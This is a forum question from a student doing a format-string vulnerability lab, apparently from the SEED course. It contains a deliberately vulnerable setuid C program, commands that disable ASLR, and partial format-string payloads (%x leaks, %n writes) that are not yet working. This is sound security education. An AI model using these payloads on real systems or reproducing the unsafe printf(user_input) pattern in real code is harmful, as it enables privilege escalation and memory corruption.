0

First year Cybersecurity student here (I am new to a lot of things, like Linux and such)

I am having some trouble modifying a secret value in my lab. Here is what I need to do for it

  • gcc -z execstack -o vul_prog vul_prog.c

  • sudo chown root vul_prog

  • sudo chmod +s vul_prog

Do the following successfully using a string format vulnerability Crash program

  • Print secret value secret

  • Modify secret value secret

  • Modify secret value secret with a predetermined value 0x42454546

  • Get a root shell (extra credit)

here is the code that we are using 

/*vul_prog.c*/
#include<stdio.h>
#include<stdlib.h>

#define SECRET 0x44

int main(int argc, char*argv[]) {
    char user_input[200];
    int secret;
    int a, b, c, d; /*other variables, not used here.*/

    /*getting the secret*/
    secret = SECRET;

    printf("The variable secret’s address is 0x%8x\n", (unsigned int)&secret);
    printf("The variable secret’s value is 0x%x or %d\n", (unsigned int)secret, secret);

    printf("Please enter a string\n");
    scanf("%s", user_input); /*getting a string from user*/

    /*Vulnerable place*/
    printf(user_input);
    printf("\n");

    /*Verify whether your attack is successful*/
    printf("The original secret: 0x%x or %d\n", SECRET, SECRET);
    printf("The new secret: 0x%x or %d\n", secret, secret);

    return 0;
}

I know what my secret value is, but I couldn't modify it. I know the commands that I have to use. I need to modify where 44 is stored at. In my case, the address is 0xbfffeb60

[10/23/19]seed@VM:~/Desktop$ ./vul_prog
The variable secret’s address is 0xbfffeb60
The variable secret’s value is 0x44 or 68
Please enter a string
.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x
.bfffeb64.44.b7fd6b28.b7ff37ec.0.b7fff000.bfffece4.44.2e78252e.252e7825
The original secret: 0x44 or 68
The new secret: 0x44 or 68

The commands I used so far

sudo sysctl -w kernel.randomize_va_space=0

gcc -z execstack -o vul_prog vul_prog.c

sudo chown root vul_prog

sudo chmod +s vul_prog

after that, I ran the program ./vul_prog and entered a bunch of %x to get address printed out. My professor said that the code for vul_prog.c is slightly modified from the original, and my book uses the original code and it gives the steps on how to modify it by using

echo $(printf "\x04\xf3\xff\xbf").%x.%x.%x.%x.%x.%n > input

vul < input

here's what input file looks like after

Póÿ¿.%x.%x.%x.%x.%x.%x.%x.%x.%n

after I run these commands, nothing changes. Then I added 3 more of ".%x" and %n at the end and still nothing. When I try to do it with only

.%x.%x.%x.%x.%x.%x.%x.%x.%n

it will give me a segmentation error

I tried emailing him today in the morning to ask him if I could meet him in his office and show him what I am doing wrong and he haven't responded yet, so I am hoping to get some more guidance from anyone who is an expert in his field.

I will add more information if needed.

EMMJAY
  • 19
  • 6
  • Now edit your Q to show what is in the file `input`. When you look at that, does it make sense vs the `printf` cmd used to produce it? (I'm thinking it doesn't ;-) ). Saw the last lines of your post. I am **not** an expert. Try looking at https://security.stackexchange.com help and see if your Q is appropriate to post there but **don't** crosspost! . Good luck. – shellter Oct 23 '19 at 17:44
  • @shellter thank you – EMMJAY Oct 23 '19 at 17:44
  • Try changing to `echo $(printf ".%x.%x.%x.%x.%x.%n", "\x04\xf3\xff\xbf") > input` You may need to separate the values, i.e. `"\x04" "\xf3" "\xff" "\xbf"` or maybe something else. That's probably all I can help with and I am busy the rest of this week. Good luck. – shellter Oct 23 '19 at 18:03

0 Answers0